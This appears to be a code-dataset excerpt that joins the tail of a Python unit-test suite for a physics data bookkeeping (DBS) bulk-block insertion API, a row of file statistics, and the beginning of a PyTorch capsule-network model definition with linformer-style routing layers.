'app_name': app_name, 'output_module_label': output_module_label,
'global_tag':global_tag}
file_output_dict = {'release_version': release_version, 'pset_hash': pset_hash, 'app_name': app_name,
'output_module_label': output_module_label, 'global_tag': global_tag}
fileList=[]
for i in range(10):
f={
'adler32': '', 'file_type': 'EDM',
'dataset': dataset,
'file_size': u'2012211901', 'auto_cross_section': 0.0,
'check_sum': u'1504266448',
'file_lumi_list': [
{'lumi_section_num': u'27414', 'run_num': u'1'},
{'lumi_section_num': u'26422', 'run_num': u'1'},
{'lumi_section_num': u'29838', 'run_num': u'1'}
],
'file_parent_list': [ ],
'event_count': u'1619',
'logical_file_name': "/store/mc/Fall08/BBJets250to500-madgraph/GEN-SIM-RAW/IDEAL_/%s/%i.root" %(uid, i),
}
fileList.append(f)
data = {'file_conf_list' : [file_output_dict],
'dataset_conf_list' : [output_module_dict],
'block_parent_list' : [],
'processing_era' : processing_dict,
'files' : fileList,
'dataset' : dataset_dict,
'primds' : primary_dict,
'acquisition_era' : acquisition_dict,
'ds_parent_list' : [],
'block' : block_dict,
'file_parent_list' : []}
api.insert('bulkblocks', data)
def test12b(self):
"""test12b: web.DBSWriterModel.insertBulkBlock: basic test"""
uniq_id = int(time.time())
bulk_primary_ds_name = 'unittest_web_primary_ds_name_%s' % (uniq_id)
bulk_procdataset = '%s-unittest_web_dataset-v%s' % (acquisition_era_name, processing_version)
bulk_dataset = '/%s/%s/%s' % (bulk_primary_ds_name,
bulk_procdataset,
tier)
bulk_block="%s#%s" % (dataset, uniq_id)
dataset_dict = {u'dataset': bulk_dataset,
u'physics_group_name': 'Tracker',
u'dataset_access_type': 'VALID', u'processed_ds_name': bulk_procdataset,
u'xtcrosssection': 123, u'data_tier_name': tier,
u'prep_id':prep_id}
block_dict = data = {u'block_name': bulk_block,
u'origin_site_name': site}
processing_dict = {u'processing_version': processing_version,
u'description':'this-is-a-test'}
acquisition_dict = {u'acquisition_era_name': acquisition_era_name, u'start_date':1234567890}
primary_dict = {u'primary_ds_name':bulk_primary_ds_name,
u'primary_ds_type':primary_ds_type}
output_module_dict = {u'release_version': release_version, u'pset_hash': pset_hash,
u'app_name': app_name, u'output_module_label': output_module_label,
u'global_tag':global_tag}
fileList = []
fileConfigList = []
for i in range(10):
uniq_id = int(time.time())*1000
f={
u'md5': 'abc', u'file_type': 'EDM',
u'file_size': '2012211901', u'auto_cross_section': 0.0,
u'check_sum': '1504266448',
u'file_lumi_list': [
{u'lumi_section_num': '27414', u'run_num': '1'},
{u'lumi_section_num': '26422', u'run_num': '1'},
{u'lumi_section_num': '29838', u'run_num': '1'}
],
u'event_count': u'1619',
u'logical_file_name': "/store/mc/Fall09/BBJets250to500-madgraph/GEN-SIM-RAW/IDEAL_/%s/%i.root" %(uniq_id, i),
}
fileList.append(f)
for i in range(2):
uniq_id = int(time.time())*1000
f={
u'file_type': 'EDM',
u'file_size': '2012211901', u'auto_cross_section': 0.0,
u'adler32': 'abc123',
u'file_lumi_list': [
{u'lumi_section_num': '27414', u'run_num': '1'},
{u'lumi_section_num': '26422', u'run_num': '1'},
{u'lumi_section_num': '29838', u'run_num': '1'}
],
u'event_count': u'1619',
u'logical_file_name': "/store/mc/Fall/BBJets250to500-madgraph/GEN-SIM-RAW/IDEAL_/%s/%i.root" %(uniq_id, i),
}
fileList.append(f)
for i in range(2):
uniq_id = int(time.time())*1000
f={
u'adler32': 'abc1234', u'file_type': 'EDM',
u'file_size': '2012211901', u'auto_cross_section': 0.0,
u'check_sum': '1504266448',
u'file_lumi_list': [
{u'lumi_section_num': '27414', u'run_num': '1'},
{u'lumi_section_num': '26422', u'run_num': '1'},
{u'lumi_section_num': '29838', u'run_num': '1'}
],
u'event_count': u'1619',
u'logical_file_name': "/store/mc/Fall15/BBJets250to500-madgraph/GEN-SIM-RAW/IDEAL_/%s/%i.root" %(uniq_id, i),
}
fileList.append(f)
file_output_dict = {u'release_version': release_version, u'pset_hash': pset_hash, u'app_name': app_name,
u'output_module_label': output_module_label, u'global_tag': global_tag, u'lfn':f["logical_file_name"]}
fileConfigList.append(file_output_dict)
data = {'file_conf_list': fileConfigList,
'dataset_conf_list': [output_module_dict],
'processing_era': processing_dict,
'files': fileList,
'dataset': dataset_dict,
'primds': primary_dict,
'acquisition_era': acquisition_dict,
'block': block_dict,
}
api.insert('bulkblocks', data)
def test12b2(self):
"""test12b2: web.DBSWriterModel.insertBulkBlock with events per lumi: basic test\n"""
uniq_id = int(time.time()) + 1
bulk_primary_ds_name = 'unittest_web_primary_ds_name_%s' % (uniq_id)
bulk_procdataset = '%s-unittest_web_dataset-v%s' % (acquisition_era_name, processing_version)
bulk_dataset = '/%s/%s/%s' % (bulk_primary_ds_name,
bulk_procdataset,
tier2)
bulk_block="%s#%s" % (bulk_dataset, uniq_id)
print('dataset = ' , bulk_dataset)
print('block = ', bulk_block)
dataset_dict = {u'dataset': bulk_dataset,
u'physics_group_name': 'Tracker',
u'dataset_access_type': 'VALID', u'processed_ds_name': bulk_procdataset,
u'xtcrosssection': 123, u'data_tier_name': tier2,
u'prep_id':prep_id}
block_dict = data = {u'block_name': bulk_block,
u'origin_site_name': site}
processing_dict = {u'processing_version': processing_version,
u'description':'this-is-a-test'}
acquisition_dict = {u'acquisition_era_name': acquisition_era_name, u'start_date':1234567890}
primary_dict = {u'primary_ds_name':bulk_primary_ds_name,
u'primary_ds_type':primary_ds_type}
output_module_dict = {u'release_version': release_version, u'pset_hash': pset_hash,
u'app_name': app_name, u'output_module_label': output_module_label,
u'global_tag':global_tag}
fileList = []
fileConfigList = []
for i in range(20,30):
uniq_id = int(time.time())*1000
f={
u'md5': 'abc', u'file_type': 'EDM',
u'file_size': '2012211901', u'auto_cross_section': 0.0,
u'check_sum': '1504266448',
u'file_lumi_list': [
{u'lumi_section_num': '27', u'run_num': '11', u'event_count': '100' },
{u'lumi_section_num': '28', u'run_num': '11', u'event_count': '111'},
{u'lumi_section_num': '29', u'run_num': '11', u'event_count': '222'}
],
u'event_count': u'1619',
u'logical_file_name': "/store/mc/Fall09/BBJets250to500-madgraph/RAW/IDEAL_/%s/%i.root" %(uniq_id, i),
}
fileList.append(f)
for i in range(40,42):
uniq_id = int(time.time())*10000
f={
u'file_type': 'EDM',
u'file_size': '2012211901', u'auto_cross_section': 0.0,
u'adler32': 'abc123',
u'file_lumi_list': [
{u'lumi_section_num': '270', u'run_num': '12', u'event_count': '300'},
{u'lumi_section_num': '280', u'run_num': '12', u'event_count': '301'},
{u'lumi_section_num': '290', u'run_num': '12', u'event_count': '302'}
],
u'event_count': u'1619',
u'logical_file_name': "/store/mc/Fall/BBJets250to500-madgraph/RAW/IDEAL_/%s/%i.root" %(uniq_id, i),
}
fileList.append(f)
for i in range(50,52):
uniq_id = int(time.time())*1000
f={
u'adler32': 'abc1234', u'file_type': 'EDM',
u'file_size': '2012211901', u'auto_cross_section': 0.0,
u'check_sum': '1504266448',
u'file_lumi_list': [
{u'lumi_section_num': '27414', u'run_num': '13', u'event_count': '400'},
{u'lumi_section_num': '26422', u'run_num': '13', u'event_count': '401'},
{u'lumi_section_num': '29838', u'run_num': '13', u'event_count': '402'}
],
u'event_count': u'1619',
u'logical_file_name': "/store/mc/Fall15/BBJets250to500-madgraph/RAW/IDEAL_/%s/%i.root" %(uniq_id, i),
}
fileList.append(f)
file_output_dict = {u'release_version': release_version, u'pset_hash': pset_hash, u'app_name': app_name,
u'output_module_label': output_module_label, u'global_tag': global_tag, u'lfn':f["logical_file_name"]}
fileConfigList.append(file_output_dict)
data = {'file_conf_list': fileConfigList,
'dataset_conf_list': [output_module_dict],
'processing_era': processing_dict,
'files': fileList,
'dataset': dataset_dict,
'primds': primary_dict,
'acquisition_era': acquisition_dict,
'block': block_dict,
}
api.insert('bulkblocks', data)
@checkException("check_sum")
def test12c(self):
"""test12c: web.DBSWriterModel.insertBulkBlock: negtive test with missing check_sum, adler32 or md5"""
uniq_id = int(time.time())*1000
bulk_primary_ds_name = 'unittest_web_primary_ds_name_%s' % (uniq_id)
bulk_procdataset = '%s-unittest_web_dataset-v%s' % (acquisition_era_name, processing_version)
bulk_dataset = '/%s/%s/%s' % (bulk_primary_ds_name,
bulk_procdataset,
tier)
bulk_block="%s#%s" % (dataset, uniq_id)
dataset_dict = {u'dataset': bulk_dataset,
u'physics_group_name': 'Tracker',
u'dataset_access_type': 'VALID', u'processed_ds_name': bulk_procdataset,
u'xtcrosssection': 123, u'data_tier_name': tier,
u'prep_id':prep_id}
block_dict = data = {u'block_name': bulk_block,
u'origin_site_name': site}
processing_dict = {u'processing_version': processing_version,
u'description':'this-is-a-test'}
acquisition_dict = {u'acquisition_era_name': acquisition_era_name, u'start_date':1234567890}
primary_dict = {u'primary_ds_name':bulk_primary_ds_name,
u'primary_ds_type':primary_ds_type}
output_module_dict = {u'release_version': release_version, u'pset_hash': pset_hash,
u'app_name': app_name, u'output_module_label': output_module_label,
u'global_tag':global_tag}
fileList = []
fileConfigList = []
for i in range(2):
f={
u'file_type': 'EDM',
u'file_size': '2012211901', u'auto_cross_section': 0.0,
u'file_lumi_list': [
{u'lumi_section_num': '27414', u'run_num': '1'},
{u'lumi_section_num': '26422', u'run_num': '1'},
{u'lumi_section_num': '29838', u'run_num': '1'}
],
u'event_count': u'1619',
u'logical_file_name': "/store/mc/Fall08/BBJets250to500-madgraph/GEN-SIM-RAW/IDEAL_/%s/%i.root" %(uniq_id, i),
}
fileList.append(f)
file_output_dict = {u'release_version': release_version, u'pset_hash': pset_hash, u'app_name': app_name,
u'output_module_label': output_module_label, u'global_tag': global_tag, u'lfn':f["logical_file_name"]}
fileConfigList.append(file_output_dict)
data = {'file_conf_list': fileConfigList,
'dataset_conf_list': [output_module_dict],
'processing_era': processing_dict,
'files': fileList,
'dataset': dataset_dict,
'primds': primary_dict,
'acquisition_era': acquisition_dict,
'block': block_dict,
}
api.insert('bulkblocks', data)
def test12d(self):
"""test12d: web.DBSWriterModel.insertBulkBlock: basic test for inserting child dataset with files"""
dataset_dict = {u'dataset': parent_stepchain_dataset,
u'physics_group_name': 'Tracker',
u'dataset_access_type': 'VALID', u'processed_ds_name': parent_procdataset,
u'xtcrosssection': 123, u'data_tier_name': tier,
u'prep_id':prep_id}
block_dict = data = {u'block_name': parent_stepchain_block,
u'origin_site_name': site}
processing_dict = {u'processing_version': processing_version,
u'description':'this-is-a-test'}
acquisition_dict = {u'acquisition_era_name': acquisition_era_name, u'start_date':1234567890}
primary_dict = {u'primary_ds_name':primary_ds_name + "_stepchain",
u'primary_ds_type':primary_ds_type}
output_module_dict = {u'release_version': release_version, u'pset_hash': pset_hash,
u'app_name': app_name, u'output_module_label': output_module_label,
u'global_tag':global_tag}
fileList = []
fileConfigList = []
for i in range(2):
f={
u'file_type': 'EDM',
u'file_size': '2012211901', u'auto_cross_section': 0.0,
u'check_sum': u'1504266448',
u'file_lumi_list': [
{u'lumi_section_num': '27414', u'run_num': '1'},
{u'lumi_section_num': '26422', u'run_num': '1'},
{u'lumi_section_num': '29838', u'run_num': '1'}
],
u'event_count': u'1619',
u'logical_file_name': "/store/mc/Fall08/BBJets250to500-madgraph/GEN-SIM-RAW/IDEAL_/parent_%s/%i.root" %(uid, i),
}
fileList.append(f)
file_output_dict = {u'release_version': release_version, u'pset_hash': pset_hash, u'app_name': app_name,
u'output_module_label': output_module_label, u'global_tag': global_tag, u'lfn':f["logical_file_name"]}
fileConfigList.append(file_output_dict)
data = {'file_conf_list': fileConfigList,
'dataset_conf_list': [output_module_dict],
'processing_era': processing_dict,
'files': fileList,
'dataset': dataset_dict,
'primds': primary_dict,
'acquisition_era': acquisition_dict,
'block': block_dict,
'dataset_parent_list': []
}
api.insert('bulkblocks', data)
def test12e(self):
"""test12e: web.DBSWriterModel.insertBulkBlock: insert bulk block with parent dataset negative test"""
dataset_dict = {u'dataset': stepchain_dataset,
u'physics_group_name': 'Tracker',
u'dataset_access_type': 'VALID', u'processed_ds_name': procdataset,
u'xtcrosssection': 123, u'data_tier_name': tier,
u'prep_id':prep_id}
block_dict = data = {u'block_name': stepchain_block,
u'origin_site_name': site}
processing_dict = {u'processing_version': processing_version,
u'description':'this-is-a-test'}
acquisition_dict = {u'acquisition_era_name': acquisition_era_name, u'start_date':1234567890}
primary_dict = {u'primary_ds_name':primary_ds_name,
u'primary_ds_type':primary_ds_type}
output_module_dict = {u'release_version': release_version, u'pset_hash': pset_hash,
u'app_name': app_name, u'output_module_label': output_module_label,
u'global_tag':global_tag}
fileList = []
fileConfigList = []
for i in range(2):
f={
u'file_type': 'EDM',
u'file_size': '2012211901', u'auto_cross_section': 0.0,
u'check_sum': u'1504266448',
u'file_lumi_list': [
{u'lumi_section_num': '27414', u'run_num': '1'},
{u'lumi_section_num': '26422', u'run_num': '1'},
{u'lumi_section_num': '29838', u'run_num': '1'}
],
u'event_count': u'1619',
u'logical_file_name': "/store/mc/Fall08/BBJets250to500-madgraph/GEN-SIM-RAW/IDEAL_/child_%s/%i.root" %(uid, i),
}
fileList.append(f)
file_output_dict = {u'release_version': release_version, u'pset_hash': pset_hash, u'app_name': app_name,
u'output_module_label': output_module_label, u'global_tag': global_tag, u'lfn':f["logical_file_name"]}
fileConfigList.append(file_output_dict)
data = {'file_conf_list': fileConfigList,
'dataset_conf_list': [output_module_dict],
'processing_era': processing_dict,
'files': fileList,
'dataset': dataset_dict,
'primds': primary_dict,
'acquisition_era': acquisition_dict,
'block': block_dict,
'dataset_parent_list': [parent_stepchain_dataset],
'file_parent_list': [{"file_parent_lfn": "/store/mc/Fall08/BBJets250to500-madgraph/GEN-SIM-RAW/IDEAL_/parent_%s/%i.root" % (
uid, i)}]
}
with self.assertRaises(Exception):
api.insert('bulkblocks', data)
def test12f(self):
"""test12f: web.DBSWriterModel.insertBulkBlock: insert bulk block with parent dataset"""
dataset_dict = {u'dataset': stepchain_dataset,
u'physics_group_name': 'Tracker',
u'dataset_access_type': 'VALID', u'processed_ds_name': procdataset,
u'xtcrosssection': 123, u'data_tier_name': tier,
u'prep_id':prep_id}
block_dict = data = {u'block_name': stepchain_block,
u'origin_site_name': site}
processing_dict = {u'processing_version': processing_version,
u'description':'this-is-a-test'}
acquisition_dict = {u'acquisition_era_name': acquisition_era_name, u'start_date':1234567890}
primary_dict = {u'primary_ds_name':primary_ds_name + "_stepchain",
u'primary_ds_type':primary_ds_type}
output_module_dict = {u'release_version': release_version, u'pset_hash': pset_hash,
u'app_name': app_name, u'output_module_label': output_module_label,
u'global_tag':global_tag}
fileList = []
fileConfigList = []
for i in range(2):
f={
u'file_type': 'EDM',
u'file_size': '2012211901', u'auto_cross_section': 0.0,
u'check_sum': u'1504266448',
u'file_lumi_list': [
{u'lumi_section_num': '27414', u'run_num': '1'},
{u'lumi_section_num': '26422', u'run_num': '1'},
{u'lumi_section_num': '29838', u'run_num': '1'}
],
u'event_count': u'1619',
u'logical_file_name': "/store/mc/Fall08/BBJets250to500-madgraph/GEN-SIM-RAW/IDEAL_/child_%s/%i.root" %(uid, i),
}
fileList.append(f)
file_output_dict = {u'release_version': release_version, u'pset_hash': pset_hash, u'app_name': app_name,
u'output_module_label': output_module_label, u'global_tag': global_tag, u'lfn':f["logical_file_name"]}
fileConfigList.append(file_output_dict)
data = {'file_conf_list': fileConfigList,
'dataset_conf_list': [output_module_dict],
'processing_era': processing_dict,
'files': fileList,
'dataset': dataset_dict,
'primds': primary_dict,
'acquisition_era': acquisition_dict,
'block': block_dict,
'dataset_parent_list': [parent_stepchain_dataset]
}
api.insert('bulkblocks', data)
def test999(self):
"""setup all necessary parameters"""
filename=os.path.join(os.path.dirname(os.path.abspath(__file__)), 'info.dict')
infoout=open(filename, "w")
infoout.write("info="+str(outDict))
infoout.close()
if __name__ == "__main__":
SUITE = unittest.TestLoader().loadTestsFromTestCase(DBSWriterModel_t)
unittest.TextTestRunner(verbosity=2).run(SUITE)
| 43.640277
| 142
| 0.569906
| 6,268
| 56,776
| 4.854499
| 0.062221
| 0.027803
| 0.041344
| 0.016564
| 0.825424
| 0.798574
| 0.775306
| 0.758118
| 0.736756
| 0.706422
| 0
| 0.041066
| 0.299176
| 56,776
| 1,300
| 143
| 43.673846
| 0.723649
| 0.004333
| 0
| 0.678917
| 0
| 0.026112
| 0.307107
| 0.053075
| 0
| 0
| 0
| 0
| 0.000967
| 0
| null | null | 0
| 0.010638
| null | null | 0.008704
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
735045cacbb6566a68320f9609cf0a374c75add9
| 53,910
|
py
|
Python
|
src/capsule_model.py
|
Sharut/Bilinear-Linformer
|
025e2ffefe8bb57092cd4a912ea66ec3d65997e0
|
[
"MIT"
] | null | null | null |
src/capsule_model.py
|
Sharut/Bilinear-Linformer
|
025e2ffefe8bb57092cd4a912ea66ec3d65997e0
|
[
"MIT"
] | null | null | null |
src/capsule_model.py
|
Sharut/Bilinear-Linformer
|
025e2ffefe8bb57092cd4a912ea66ec3d65997e0
|
[
"MIT"
] | null | null | null |
#
# For licensing see accompanying LICENSE file.
# Copyright (C) 2019 Apple Inc. All Rights Reserved.
#
from src import layers
import torch.nn as nn
import torch.nn.functional as F
import torch
'''
{'backbone': {'kernel_size': 3, 'output_dim': 128, 'input_dim': 3, 'stride': 2, 'padding': 1, 'out_img_size': 16}, 'primary_capsules': {'kernel_size': 1, 'stride': 1, 'input_dim': 128, 'caps_dim': 16, 'nu
m_caps': 32, 'padding': 0, 'out_img_size': 16}, 'capsules': [{'type': 'CONV', 'num_caps': 32, 'caps_dim': 16, 'kernel_size': 3, 'stride': 2, 'matrix_pose': True, 'out_img_size': 7}, {'type': 'CONV', 'num_
caps': 32, 'caps_dim': 16, 'kernel_size': 3, 'stride': 1, 'matrix_pose': True, 'out_img_size': 5}], 'class_capsules': {'num_caps': 10, 'caps_dim': 16, 'matrix_pose': True}}
{'kernel_size': 1, 'stride': 1, 'input_dim': 128, 'caps_dim': 16, 'num_caps': 32, 'padding': 0, 'out_img_size': 16}
'''
# Capsule model with bilinear routing and random projections
class CapsBilinearLinformerUnfoldModel(nn.Module):
def __init__(self,
image_dim_size,
params,
dataset,
backbone,
dp,
num_routing,
sequential_routing=True):
super(CapsBilinearLinformerUnfoldModel, self).__init__()
#### Parameters
self.sequential_routing = sequential_routing
## Primary Capsule Layer
self.pc_num_caps = params['primary_capsules']['num_caps']
self.pc_caps_dim = params['primary_capsules']['caps_dim']
self.pc_output_dim = params['primary_capsules']['out_img_size']
## General
self.num_routing = num_routing # >3 may cause slow converging
#### Building Networks
## Backbone (before capsule)
if backbone == 'simple':
self.pre_caps = layers.simple_backbone(params['backbone']['input_dim'],
params['backbone']['output_dim'],
params['backbone']['kernel_size'],
params['backbone']['stride'],
params['backbone']['padding'])
elif backbone == 'resnet':
# Ouputs 16 X 16 X 128 dim
if dataset == 'CIFAR10' or dataset == 'CIFAR100':
print("Using CIFAR backbone")
self.pre_caps = layers.resnet_backbone_cifar(params['backbone']['input_dim'],
params['backbone']['output_dim'],
params['backbone']['stride'])
else:
print("Using New ResNet Backbone")
self.pre_caps = layers.resnet_backbone_imagenet(params['backbone']['input_dim'],
params['backbone']['output_dim'],
params['backbone']['stride'])
## Primary Capsule Layer (a single CNN)
self.pc_layer = nn.Conv2d(in_channels=params['primary_capsules']['input_dim'],
out_channels=params['primary_capsules']['num_caps'] *\
params['primary_capsules']['caps_dim'],
kernel_size=params['primary_capsules']['kernel_size'],
stride=params['primary_capsules']['stride'],
padding=params['primary_capsules']['padding'],
bias=False)
#self.pc_layer = nn.Sequential()
self.nonlinear_act = nn.LayerNorm(params['primary_capsules']['caps_dim'])
## Main Capsule Layers
self.capsule_layers = nn.ModuleList([])
for i in range(len(params['capsules'])):
if params['capsules'][i]['type'] == 'CONV':
in_n_caps = params['primary_capsules']['num_caps'] if i==0 else \
params['capsules'][i-1]['num_caps']
in_d_caps = params['primary_capsules']['caps_dim'] if i==0 else \
params['capsules'][i-1]['caps_dim']
output_img_size = params['capsules'][i]['out_img_size']
input_img_size = params['primary_capsules']['out_img_size'] if i==0 else \
params['capsules'][i-1]['out_img_size']
self.capsule_layers.append(
layers.LACapsuleCONV(in_n_capsules=in_n_caps,
in_d_capsules=in_d_caps,
out_n_capsules=params['capsules'][i]['num_caps'],
out_d_capsules=params['capsules'][i]['caps_dim'],
kernel_size=params['capsules'][i]['kernel_size'],
stride=params['capsules'][i]['stride'],
input_img_size = input_img_size,
output_img_size = output_img_size,
hidden_dim= params['capsules'][i]['hidden_dim'],
matrix_pose=params['capsules'][i]['matrix_pose'],
dp=dp,
coordinate_add=False,
padding=params['capsules'][i].get('padding', None)
)
)
elif params['capsules'][i]['type'] == 'FC':
output_img_size = 1
if i == 0:
in_n_caps = params['primary_capsules']['num_caps'] * params['primary_capsules']['out_img_size'] *\
params['primary_capsules']['out_img_size']
in_d_caps = params['primary_capsules']['caps_dim']
input_img_size = params['primary_capsules']['out_img_size']
elif params['capsules'][i-1]['type'] == 'FC':
in_n_caps = params['capsules'][i-1]['num_caps']
in_d_caps = params['capsules'][i-1]['caps_dim']
input_img_size = 1
elif params['capsules'][i-1]['type'] == 'CONV':
in_n_caps = params['capsules'][i-1]['num_caps'] * params['capsules'][i-1]['out_img_size'] *\
params['capsules'][i-1]['out_img_size']
in_d_caps = params['capsules'][i-1]['caps_dim']
input_img_size = params['capsules'][i-1]['out_img_size']
self.capsule_layers.append(
layers.LACapsuleFC(in_n_capsules=in_n_caps,
in_d_capsules=in_d_caps,
out_n_capsules=params['capsules'][i]['num_caps'],
out_d_capsules=params['capsules'][i]['caps_dim'],
input_img_size = input_img_size,
output_img_size = output_img_size,
hidden_dim= params['capsules'][i]['hidden_dim'],
matrix_pose=params['capsules'][i]['matrix_pose'],
dp=dp
)
)
## Class Capsule Layer
if not len(params['capsules'])==0:
output_img_size = 1
if params['capsules'][-1]['type'] == 'FC':
in_n_caps = params['capsules'][-1]['num_caps']
in_d_caps = params['capsules'][-1]['caps_dim']
input_img_size = 1
elif params['capsules'][-1]['type'] == 'CONV':
in_n_caps = params['capsules'][-1]['num_caps'] * params['capsules'][-1]['out_img_size'] *\
params['capsules'][-1]['out_img_size']
in_d_caps = params['capsules'][-1]['caps_dim']
input_img_size = params['capsules'][-1]['out_img_size']
else:
in_n_caps = params['primary_capsules']['num_caps'] * params['primary_capsules']['out_img_size'] *\
params['primary_capsules']['out_img_size']
in_d_caps = params['primary_capsules']['caps_dim']
input_img_size = params['primary_capsules']['out_img_size']
self.capsule_layers.append(
layers.LACapsuleFC(in_n_capsules=in_n_caps,
in_d_capsules=in_d_caps,
out_n_capsules=params['class_capsules']['num_caps'],
out_d_capsules=params['class_capsules']['caps_dim'],
input_img_size = input_img_size,
output_img_size = output_img_size,
hidden_dim= params['capsules'][i]['hidden_dim'],
matrix_pose=params['class_capsules']['matrix_pose'],
dp=dp
)
)
## After Capsule
# fixed classifier for all class capsules
self.final_fc = nn.Linear(params['class_capsules']['caps_dim'], 1)
# different classifier for different capsules
#self.final_fc = nn.Parameter(torch.randn(params['class_capsules']['num_caps'], params['class_capsules']['caps_dim']))
def forward(self, x, lbl_1=None, lbl_2=None):
#### Forward Pass
## Backbone (before capsule)
c = self.pre_caps(x)
# print(c.shape)
# print("Backbone: ", c.shape)
## Primary Capsule Layer (a single CNN)
u = self.pc_layer(c) # torch.Size([100, 512, 14, 14])
u = u.permute(0, 2, 3, 1) # 100, 14, 14, 512
# print("Shape:", u.shape)
u = u.view(u.shape[0], self.pc_output_dim, self.pc_output_dim, self.pc_num_caps, self.pc_caps_dim) # 100, 14, 14, 32, 16
u = u.permute(0, 3, 1, 2, 4) # 100, 32, 14, 14, 16
init_capsule_value = self.nonlinear_act(u)#capsule_utils.squash(u)
## Main Capsule Layers
# concurrent routing
if not self.sequential_routing:
# first iteration
# perform initilialization for the capsule values as single forward passing
capsule_values, _val = [init_capsule_value], init_capsule_value
for i in range(len(self.capsule_layers)):
_val = self.capsule_layers[i].forward(_val, 0)
capsule_values.append(_val) # get the capsule value for next layer
# second to t iterations
# perform the routing between capsule layers
for n in range(self.num_routing-1):
_capsule_values = [init_capsule_value]
for i in range(len(self.capsule_layers)):
_val = self.capsule_layers[i].forward(capsule_values[i], n,
capsule_values[i+1])
_capsule_values.append(_val)
capsule_values = _capsule_values
# sequential routing
else:
capsule_values, _val = [init_capsule_value], init_capsule_value
for i in range(len(self.capsule_layers)):
# first iteration
__val = self.capsule_layers[i].forward(_val, 0)
# second to t iterations
# perform the routing between capsule layers
for n in range(self.num_routing-1):
__val = self.capsule_layers[i].forward(_val, n, __val)
_val = __val
capsule_values.append(_val)
## After Capsule
out = capsule_values[-1]
# print("out shape, ", out.shape)
out = self.final_fc(out) # fixed classifier for all capsules
# print("classifier shape, ", out.shape)
out = out.squeeze(1) # fixed classifier for all capsules
out = out.squeeze(2)
out = out.squeeze(1)
#out = torch.einsum('bnd, nd->bn', out, self.final_fc) # different classifiers for distinct capsules
# print("Final shape, ", out.shape)
return out
# Capsule model
class CapsModel(nn.Module):
def __init__(self,
image_dim_size,
params,
dataset,
backbone,
dp,
num_routing,
sequential_routing=True):
super(CapsModel, self).__init__()
#### Parameters
self.sequential_routing = sequential_routing
## Primary Capsule Layer
self.pc_num_caps = params['primary_capsules']['num_caps']
self.pc_caps_dim = params['primary_capsules']['caps_dim']
self.pc_output_dim = params['primary_capsules']['out_img_size']
## General
self.num_routing = num_routing # >3 may cause slow converging
#### Building Networks
## Backbone (before capsule)
if backbone == 'simple':
self.pre_caps = layers.simple_backbone(params['backbone']['input_dim'],
params['backbone']['output_dim'],
params['backbone']['kernel_size'],
params['backbone']['stride'],
params['backbone']['padding'])
elif backbone == 'resnet':
# Ouputs 16 X 16 X 128 dim
if dataset == 'CIFAR10' or dataset == 'CIFAR100' or "NIST" in dataset:
print("Using standard ResNet Backbone")
self.pre_caps = layers.resnet_backbone_cifar(params['backbone']['input_dim'],
params['backbone']['output_dim'],
params['backbone']['stride'])
else:
print("Using New ResNet Backbone")
self.pre_caps = layers.resnet_backbone_imagenet(params['backbone']['input_dim'],
params['backbone']['output_dim'],
params['backbone']['stride'])
## Primary Capsule Layer (a single CNN)
# {'kernel_size': 1, 'stride': 1, 'input_dim': 128, 'caps_dim': 16, 'num_caps': 32, 'padding': 0, 'out_img_size': 16}
print(params['primary_capsules'])
self.pc_layer = nn.Conv2d(in_channels=params['primary_capsules']['input_dim'],
out_channels=params['primary_capsules']['num_caps'] *\
params['primary_capsules']['caps_dim'],
kernel_size=params['primary_capsules']['kernel_size'],
stride=params['primary_capsules']['stride'],
padding=params['primary_capsules']['padding'],
bias=False)
#self.pc_layer = nn.Sequential()
self.nonlinear_act = nn.LayerNorm(params['primary_capsules']['caps_dim'])
## Main Capsule Layers
self.capsule_layers = nn.ModuleList([])
for i in range(len(params['capsules'])):
if params['capsules'][i]['type'] == 'CONV':
in_n_caps = params['primary_capsules']['num_caps'] if i==0 else \
params['capsules'][i-1]['num_caps']
in_d_caps = params['primary_capsules']['caps_dim'] if i==0 else \
params['capsules'][i-1]['caps_dim']
# num_in_capsules=32, in_cap_d=16, out_Cap=32, out_dim_cap=16
# 3x3 kernel, stride 2 and output shape: 7x7
self.capsule_layers.append(
layers.CapsuleCONV(in_n_capsules=in_n_caps,
in_d_capsules=in_d_caps,
out_n_capsules=params['capsules'][i]['num_caps'],
out_d_capsules=params['capsules'][i]['caps_dim'],
kernel_size=params['capsules'][i]['kernel_size'],
stride=params['capsules'][i]['stride'],
matrix_pose=params['capsules'][i]['matrix_pose'],
dp=dp,
coordinate_add=False
)
)
elif params['capsules'][i]['type'] == 'FC':
if i == 0:
# When there is no Conv layer after primary capsules
in_n_caps = params['primary_capsules']['num_caps'] * params['primary_capsules']['out_img_size'] *\
params['primary_capsules']['out_img_size']
in_d_caps = params['primary_capsules']['caps_dim']
elif params['capsules'][i-1]['type'] == 'FC':
in_n_caps = params['capsules'][i-1]['num_caps']
in_d_caps = params['capsules'][i-1]['caps_dim']
elif params['capsules'][i-1]['type'] == 'CONV':
# There are a total of 14X14X32 capsule outputs, each being 16 dimensional
in_n_caps = params['capsules'][i-1]['num_caps'] * params['capsules'][i-1]['out_img_size'] *\
params['capsules'][i-1]['out_img_size']
in_d_caps = params['capsules'][i-1]['caps_dim']
self.capsule_layers.append(
layers.CapsuleFC(in_n_capsules=in_n_caps,
in_d_capsules=in_d_caps,
out_n_capsules=params['capsules'][i]['num_caps'],
out_d_capsules=params['capsules'][i]['caps_dim'],
matrix_pose=params['capsules'][i]['matrix_pose'],
dp=dp
)
)
## Class Capsule Layer
if not len(params['capsules'])==0:
if params['capsules'][-1]['type'] == 'FC':
in_n_caps = params['capsules'][-1]['num_caps']
in_d_caps = params['capsules'][-1]['caps_dim']
elif params['capsules'][-1]['type'] == 'CONV':
in_n_caps = params['capsules'][-1]['num_caps'] * params['capsules'][-1]['out_img_size'] *\
params['capsules'][-1]['out_img_size']
in_d_caps = params['capsules'][-1]['caps_dim']
else:
in_n_caps = params['primary_capsules']['num_caps'] * params['primary_capsules']['out_img_size'] *\
params['primary_capsules']['out_img_size']
in_d_caps = params['primary_capsules']['caps_dim']
self.capsule_layers.append(
layers.CapsuleFC(in_n_capsules=in_n_caps,
in_d_capsules=in_d_caps,
out_n_capsules=params['class_capsules']['num_caps'],
out_d_capsules=params['class_capsules']['caps_dim'],
matrix_pose=params['class_capsules']['matrix_pose'],
dp=dp
)
)
## After Capsule
# fixed classifier for all class capsules
